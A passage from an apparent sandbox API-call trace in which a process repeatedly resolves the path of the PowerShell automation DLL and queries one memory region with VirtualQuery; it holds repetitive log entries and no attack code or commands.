lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.049] VirtualQuery (in: lpAddress=0x1abbd0, lpBuffer=0x1aca90, dwLength=0x30 | out: lpBuffer=0x1aca90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.050] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.050] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.060] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.060] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.060] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.060] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.061] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.061] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.061] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.061] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.061] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.062] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.062] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.062] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.063] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.063] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.063] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xb9c0049, Data2=0x8693, Data3=0x4da8, Data4=([0]=0x8a, [1]=0x44, [2]=0x3f, [3]=0x75, [4]=0x88, [5]=0xa7, [6]=0xc9, [7]=0xd0))) returned 0x0 [0074.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.064] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x553dacbb, Data2=0x1bda, Data3=0x4c40, Data4=([0]=0xb7, [1]=0x57, [2]=0xac, [3]=0x5a, [4]=0xcf, [5]=0xbd, [6]=0x12, [7]=0x67))) returned 0x0 [0074.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.066] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.067] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.067] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.067] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.067] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.068] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.068] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.069] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.070] GetFullPathNameW (in: 